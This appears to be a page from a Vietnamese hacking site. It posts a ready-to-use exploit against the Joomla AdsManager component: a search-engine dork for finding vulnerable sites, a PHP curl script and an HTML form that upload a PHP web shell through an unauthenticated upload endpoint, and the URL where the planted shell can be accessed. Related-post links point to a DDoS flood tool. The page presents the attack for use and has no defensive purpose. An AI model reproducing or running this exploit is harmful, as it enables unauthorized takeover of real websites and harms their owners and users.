Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
CODE PHP :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | <?php $url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here $post = array ( "file" => "@shell.jpg", "name" => "shell.php" ); $ch = curl_init ("$url"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, ); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, ); curl_setopt ($ch, CURLOPT_POST, 1); @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch); curl_close ($ch); echo $data; ?> |
#CSRF :
1 2 3 4 | <form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form> |
Acces Shell: site.com/tmp/plupload/shell.php
![[FaceBook] Hướng Dẫn mở nick FB bị 13t,14t & FAQ](https://anonyviet.com/wp-content/uploads/2015/12/unlockfb-218x150.jpg "[FaceBook] Hướng Dẫn mở nick FB bị 13t,14t & FAQ")
![[Source] Attack Flood Version 1.0 DuyKhang-MZG 10](https://anonyviet.com/wp-content/uploads/2015/12/ddos_map-218x150.jpg "[Source] Attack Flood Version 1.0 DuyKhang-MZG")
Nguyễn Lam để đây không biết chừng nào tới đây..hi..hi